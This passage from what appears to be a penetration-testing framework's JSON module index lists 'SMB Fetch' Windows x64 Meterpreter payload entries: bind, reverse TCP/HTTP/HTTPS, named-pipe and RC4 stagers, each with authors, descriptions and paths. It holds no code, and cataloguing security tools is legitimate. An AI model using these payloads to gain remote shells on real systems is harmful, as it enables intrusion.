"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/messagebox",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_http": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_https": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves",
|
||||
"hdm <x@hdm.io>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"UserExistsError",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_bind_named_pipe",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_bind_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_http": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
